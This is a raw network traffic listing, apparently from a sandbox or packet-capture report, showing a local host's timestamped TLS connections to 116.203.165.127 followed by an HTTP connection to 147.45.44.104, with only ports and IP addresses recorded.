Sep 21, 2024 18:51:55.360238075 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.360251904 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.360304117 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.360872984 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.360887051 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.360953093 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.360966921 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.361021042 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.363523960 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.363538980 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.363612890 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.363627911 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.363681078 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.364125967 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.364142895 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.364212036 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.364227057 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.364280939 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.365103960 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.365120888 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.365185976 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.365200043 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.365257025 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.365612984 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.365627050 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.365808964 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.365823030 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.365885973 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.406083107 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.406099081 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.406187057 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.406209946 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.406275988 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.446471930 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.446486950 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.446593046 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.446631908 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.446696997 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.447072029 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.447088003 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.447134018 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.447150946 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.447180033 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.447202921 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.448019981 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.448035955 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.448095083 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.448108912 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.448167086 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.451117039 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.451132059 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.451196909 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.451220989 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.451272011 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.451662064 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.451678038 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.451733112 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.451750994 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.451802015 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.452514887 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.452536106 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.452575922 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.452600956 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.452630997 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.452652931 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.453490019 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.453530073 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.453576088 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.453591108 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.453625917 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.453646898 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.492980003 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.492995977 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.493068933 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.493117094 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.493149996 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.493189096 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.533354044 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.533370972 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.533451080 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.533488989 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.533549070 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.533842087 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.533857107 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.533921003 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.533936977 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.533992052 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.534846067 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.534859896 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.534919024 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.534934044 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.534986973 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.537852049 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.537868023 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.537933111 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.537947893 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.538008928 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.538574934 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.538590908 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.538661957 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.538676977 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.538736105 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.539217949 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.539232969 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.539293051 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.539307117 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.539361000 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.539752960 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.539767027 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.539820910 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.539834976 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.539886951 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.579544067 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.579561949 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.579694986 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.579719067 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.579777956 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.620145082 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.620161057 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.620398998 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.620462894 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.620549917 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.621566057 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.621582985 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.621654034 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.621670961 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.621733904 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.623064995 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.623080015 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.623152018 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.623166084 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.623229027 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.624990940 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.625005960 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.625080109 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.625093937 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.625153065 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.626600027 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.626621008 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.626688957 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.626703024 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.626759052 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.627131939 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.627147913 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.627213001 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.627226114 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.627280951 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.627856016 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.627871037 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.627944946 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.627958059 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.628015041 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.666471004 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.666486979 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.666582108 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.666625977 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.666687012 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.707104921 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.707143068 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.707185984 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:55.707205057 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.707271099 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.707654953 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:55.707688093 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:56.032286882 CEST	49757	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:56.032326937 CEST	443	49757	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:56.032421112 CEST	49757	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:56.032680035 CEST	49757	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:56.032691956 CEST	443	49757	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:57.013746023 CEST	443	49757	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:57.014190912 CEST	49757	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:57.014600039 CEST	49757	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:57.014610052 CEST	443	49757	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:57.016630888 CEST	49757	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:57.016637087 CEST	443	49757	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:57.016685009 CEST	49757	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:57.016690016 CEST	443	49757	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:57.251123905 CEST	49758	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:57.251157999 CEST	443	49758	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:57.251224995 CEST	49758	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:57.252286911 CEST	49758	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:57.252300024 CEST	443	49758	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:57.749094963 CEST	443	49757	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:57.749196053 CEST	49757	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:57.749217033 CEST	443	49757	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:57.749275923 CEST	49757	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:57.749305010 CEST	443	49757	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:57.749357939 CEST	49757	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:57.750282049 CEST	49757	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:57.750299931 CEST	443	49757	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:57.902240038 CEST	443	49758	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:57.902338028 CEST	49758	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:57.902873039 CEST	49758	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:57.902880907 CEST	443	49758	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:57.905961990 CEST	49758	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:57.905968904 CEST	443	49758	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:58.749974966 CEST	443	49758	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:58.750030041 CEST	443	49758	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:58.750180960 CEST	443	49758	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:58.750191927 CEST	49758	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:58.750238895 CEST	49758	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:58.750579119 CEST	49758	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:58.750605106 CEST	443	49758	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:58.753176928 CEST	49759	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:58.753278017 CEST	443	49759	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:58.753387928 CEST	49759	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:58.753693104 CEST	49759	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:58.753720045 CEST	443	49759	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:59.401583910 CEST	443	49759	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:59.401700974 CEST	49759	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:59.402232885 CEST	49759	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:59.402262926 CEST	443	49759	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:59.404364109 CEST	49759	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:59.404380083 CEST	443	49759	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:00.190705061 CEST	443	49759	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:00.190759897 CEST	443	49759	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:00.190933943 CEST	443	49759	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:00.191015959 CEST	49759	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:00.191015959 CEST	49759	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:00.191467047 CEST	49759	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:00.191507101 CEST	443	49759	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:00.209013939 CEST	49761	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:00.209055901 CEST	443	49761	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:00.209130049 CEST	49761	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:00.209347010 CEST	49761	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:00.209362030 CEST	443	49761	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:00.881481886 CEST	443	49761	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:00.881617069 CEST	49761	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:00.882224083 CEST	49761	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:00.882237911 CEST	443	49761	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:00.884423971 CEST	49761	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:00.884433031 CEST	443	49761	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:01.588088989 CEST	443	49761	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:01.588186026 CEST	49761	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:01.588191986 CEST	443	49761	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:01.588247061 CEST	49761	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:01.607777119 CEST	49761	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:01.607804060 CEST	443	49761	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:02.287693977 CEST	49762	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:02.287745953 CEST	443	49762	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:02.287839890 CEST	49762	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:02.288275957 CEST	49762	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:02.288294077 CEST	443	49762	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:03.763470888 CEST	443	49762	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:03.763591051 CEST	49762	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:03.764254093 CEST	49762	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:03.764266968 CEST	443	49762	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:03.766964912 CEST	49762	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:03.766973019 CEST	443	49762	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:03.767059088 CEST	49762	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:03.767075062 CEST	443	49762	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:03.767124891 CEST	49762	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:03.767131090 CEST	443	49762	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:03.767189026 CEST	49762	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:03.767200947 CEST	443	49762	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:03.767261982 CEST	49762	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:03.767285109 CEST	443	49762	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:03.767347097 CEST	49762	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:03.767363071 CEST	443	49762	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:03.767426014 CEST	49762	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:03.767479897 CEST	49762	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:03.767537117 CEST	443	49762	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:05.076314926 CEST	443	49762	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:05.076397896 CEST	49762	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:05.076416016 CEST	443	49762	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:05.076487064 CEST	443	49762	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:05.076491117 CEST	49762	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:05.076556921 CEST	49762	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:05.076849937 CEST	49762	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:05.076867104 CEST	443	49762	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:05.080857038 CEST	49763	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:05.080955029 CEST	443	49763	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:05.081063032 CEST	49763	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:05.081289053 CEST	49763	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:05.081329107 CEST	443	49763	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:06.071872950 CEST	443	49763	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:06.072019100 CEST	49763	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:06.080787897 CEST	49763	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:06.080811977 CEST	443	49763	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:06.092269897 CEST	49763	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:06.092277050 CEST	443	49763	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:06.833084106 CEST	443	49763	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:06.833194971 CEST	49763	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:06.833254099 CEST	443	49763	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:06.833290100 CEST	443	49763	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:06.833319902 CEST	49763	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:06.833353043 CEST	49763	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:06.833456039 CEST	49763	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:06.833487988 CEST	443	49763	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:06.836918116 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:06.841805935 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:06.841941118 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:06.842127085 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:06.846899986 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.460275888 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.460341930 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.460381031 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.460437059 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.460470915 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.460506916 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.460539103 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.460598946 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.460599899 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.460635900 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.460661888 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.460670948 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.460705042 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.460736036 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.460748911 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.460808992 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.465624094 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.465679884 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.465718031 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.465742111 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.556302071 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.556354046 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.556391954 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.556411028 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.556415081 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.556447983 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.556473970 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.556483984 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.556500912 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.556516886 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.556535006 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.556564093 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.556571960 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.556611061 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.556627035 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.556655884 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.556912899 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.556957006 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.556969881 CEST	49764	80	192.168.2.4	147.45.44.104
